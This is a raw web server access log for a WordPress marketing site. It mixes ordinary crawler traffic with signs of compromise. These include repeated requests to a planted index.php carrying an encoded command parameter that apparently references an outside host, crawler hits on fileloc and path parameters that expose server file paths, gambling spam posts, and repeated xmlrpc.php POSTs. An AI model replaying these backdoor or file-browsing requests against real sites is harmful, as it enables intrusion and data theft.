142.4.205.1 - - [17/Oct/2025:10:19:42 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343338322p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303738322q3433646536386234636238616261313431396334633566666638393131383337222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
216.73.216.189 - - [17/Oct/2025:10:20:58 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentynineteen%2Ftemplate-parts%2Fcontent HTTP/1.0" 200 7229 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:20:58 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentyseventeen%2Ftemplate-parts%2Fheader HTTP/1.0" 200 7122 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:20:59 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentyseventeen%2Fassets%2Fcss HTTP/1.0" 200 7288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:20:59 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Fizo%2Fassets%2Fcss HTTP/1.0" 200 7249 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:21:00 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-includes%2Fblocks%2Farchives%2Farchives%2Fcache.php&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-includes%2Fblocks%2Farchives%2Farchives HTTP/1.0" 200 11331 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:21:00 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentyseventeen%2Fassets%2Fjs HTTP/1.0" 200 7372 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:21:01 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Fizo%2Fassets%2Fjs HTTP/1.0" 200 7226 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
142.4.205.1 - - [17/Oct/2025:10:20:02 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343430322p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303830322q3038626230383463333539623834316131386532353737636161616433393236222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.203 - - [17/Oct/2025:10:21:06 -0400] "GET /products/inapplicability1034282?id=346 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.194 - - [17/Oct/2025:10:21:11 -0400] "GET /products/mesobenthos477139?id=22 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [17/Oct/2025:10:21:14 -0400] "GET /products/chiot1358148?id=945 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.1 - - [17/Oct/2025:10:21:16 -0400] "GET /products/guineaman1580131?id=104 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.198 - - [17/Oct/2025:10:21:19 -0400] "GET /products/celestine979799?id=379 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:10:20:22 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343432322p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303832322q3765616631646438376434616362323330393936363364313835623263643031222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
57.141.0.21 - - [17/Oct/2025:10:21:31 -0400] "GET /market/2274889075.htm?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/index.php&path=/var/www/vhosts/academiedumarketing.com/public_html HTTP/1.0" 200 42375 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
185.191.171.14 - - [17/Oct/2025:10:21:45 -0400] "GET /products/insultable1550714?id=485 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:10:20:47 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343434372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303834372q3531303238313339373161636432323730336138653536373966333534336666222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.201 - - [17/Oct/2025:10:21:50 -0400] "GET /products/kentrogon13836?id=999 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
88.99.162.239 - - [17/Oct/2025:10:21:59 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
142.4.205.1 - - [17/Oct/2025:10:21:07 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343436372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303836372q6364313965346464356166356137383239393535646365306138326263346136222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
216.73.216.189 - - [17/Oct/2025:10:22:08 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Fizo%2Fassets%2Fimages HTTP/1.0" 200 7401 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:22:08 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentyseventeen%2Ftemplate-parts%2Ffooter HTTP/1.0" 200 7120 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.191.171.3 - - [17/Oct/2025:10:22:08 -0400] "GET /products/kinglet1945138?id=202 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.189 - - [17/Oct/2025:10:22:09 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentynineteen%2Ftemplate-parts%2Fpost HTTP/1.0" 200 7122 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:22:09 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentyseventeen%2Ftemplate-parts%2Fpage HTTP/1.0" 200 7153 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:22:10 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-includes%2Fblocks%2Farchives%2Farchives%2Findex.php&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-includes%2Fblocks%2Farchives%2Farchives HTTP/1.0" 200 8520 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:22:10 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentyseventeen%2Ftemplate-parts%2Fpost HTTP/1.0" 200 7320 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:22:11 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentynineteen%2Ftemplate-parts%2Fheader HTTP/1.0" 200 7120 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
88.99.162.239 - - [17/Oct/2025:10:22:12 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
88.99.162.239 - - [17/Oct/2025:10:22:20 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
142.4.205.1 - - [17/Oct/2025:10:21:27 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343438372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303838372q3839386364396130336333656565346266323437646534393066306537303832222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
216.73.216.189 - - [17/Oct/2025:10:22:29 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fimages%2Fimages%2Fimages%2Fimages%2Favi_68d6388b6a630.zip&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fimages%2Fimages%2Fimages%2Fimages HTTP/1.0" 200 6708 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
88.99.162.239 - - [17/Oct/2025:10:22:29 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
216.73.216.189 - - [17/Oct/2025:10:22:29 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fimages%2Fimages%2Fimages%2Fimages%2FV.tif&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fimages%2Fimages%2Fimages%2Fimages HTTP/1.0" 200 8955 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:22:30 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fimages%2Fimages%2Fimages%2Fimages%2Fjpeg_68ded1d71d6e0.zip&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fimages%2Fimages%2Fimages%2Fimages HTTP/1.0" 200 6709 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:22:30 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fimages%2Fimages%2Fimages%2Fimages%2Fimages HTTP/1.0" 200 7298 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:22:31 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentysixteen%2Ffonts%2Fmerriweather.css&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentysixteen%2Ffonts HTTP/1.0" 200 7600 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:22:31 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fimages%2Fimages%2Fimages%2Fimages%2Findex.php&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fimages%2Fimages%2Fimages%2Fimages HTTP/1.0" 200 9005 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:22:32 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentysixteen%2Fgenericons%2FLICENSE.txt&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentysixteen%2Fgenericons HTTP/1.0" 200 13638 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.96.205 - - [17/Oct/2025:10:22:35 -0400] "GET /products/browden1244886?id=663 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.211 - - [17/Oct/2025:10:22:40 -0400] "GET /products/emblematically151516?id=598 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
88.99.162.239 - - [17/Oct/2025:10:22:42 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
142.4.205.1 - - [17/Oct/2025:10:21:47 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343530372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303930372q3330373434363035366262643138383364653338343238383538613965663330222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
34.231.118.144 - - [17/Oct/2025:10:22:47 -0400] "GET /2025/10/08/togel-digital-era-explained/?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/pages.php&path=/var/www/vhosts/academiedumarketing.com/public_html HTTP/1.0" 200 7466 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
185.191.171.10 - - [17/Oct/2025:10:22:47 -0400] "GET /products/bestialism277373?id=588 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
34.204.150.196 - - [17/Oct/2025:10:22:50 -0400] "GET /2025/10/08/togel-digital-era-explained/?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/item.php&path=/var/www/vhosts/academiedumarketing.com/public_html HTTP/1.0" 200 7626 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
52.3.155.146 - - [17/Oct/2025:10:22:54 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/assets HTTP/1.0" 200 7321 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
185.191.171.16 - - [17/Oct/2025:10:22:54 -0400] "GET /products/ensiferi1549580?id=842 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
44.221.37.41 - - [17/Oct/2025:10:22:57 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/theme-previews.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 7795 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
44.214.19.8 - - [17/Oct/2025:10:23:02 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/class-wp-feed-cache.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 7184 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.189 - - [17/Oct/2025:10:23:05 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2FbrYIQEH%2FbrYIQEH%2FbrYIQEH%2FbrYIQEH%2Fcache.php&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2FbrYIQEH%2FbrYIQEH%2FbrYIQEH%2FbrYIQEH HTTP/1.0" 200 11309 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:23:05 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfour%2Fparts%2Ffooter.html&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfour%2Fparts HTTP/1.0" 200 6767 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:23:06 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Fizo%2Fassets%2Ffonts HTTP/1.0" 200 7219 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
142.4.205.1 - - [17/Oct/2025:10:22:07 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343532372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303932372q6230383865393562623537613762323966613162343463326137663566383239222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
216.73.216.189 - - [17/Oct/2025:10:23:06 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentyseventeen%2Fassets%2Ffonts HTTP/1.0" 200 7148 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.213.213.161 - - [17/Oct/2025:10:23:06 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/theme.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 37439 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.189 - - [17/Oct/2025:10:23:07 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentynineteen%2Ftemplate-parts%2Ffooter HTTP/1.0" 200 7067 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:23:07 -0400] "GET /category/uncategorized?fileloc=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfour%2Fparts%2Fheader.html&path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentytwentyfour%2Fparts HTTP/1.0" 200 7141 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [17/Oct/2025:10:23:08 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fwww%2Fwp-content%2Fthemes%2Ftwentyseventeen%2Fassets%2Fimages HTTP/1.0" 200 7504 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.4.238.8 - - [17/Oct/2025:10:23:10 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-admin/menu-header.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-admin HTTP/1.0" 200 9570 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
50.19.221.48 - - [17/Oct/2025:10:23:14 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/class-wp-comment.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 9264 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
52.2.191.202 - - [17/Oct/2025:10:23:17 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/block-patterns.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 9769 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
3.221.50.71 - - [17/Oct/2025:10:23:24 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-admin/credits.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-admin HTTP/1.0" 200 7940 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
114.119.128.196 - - [17/Oct/2025:10:23:25 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/softaculous_backups/tmp HTTP/1.0" 200 6744 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/softaculous_backups" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
35.171.117.160 - - [17/Oct/2025:10:23:25 -0400] "GET /2025/10/03/best-strategies-for-togel-players/?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/block-bindings.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 8358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
142.4.205.1 - - [17/Oct/2025:10:22:27 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731343534372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731303934372q6635316638303932383563333066653163386537653239373232343135633334222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
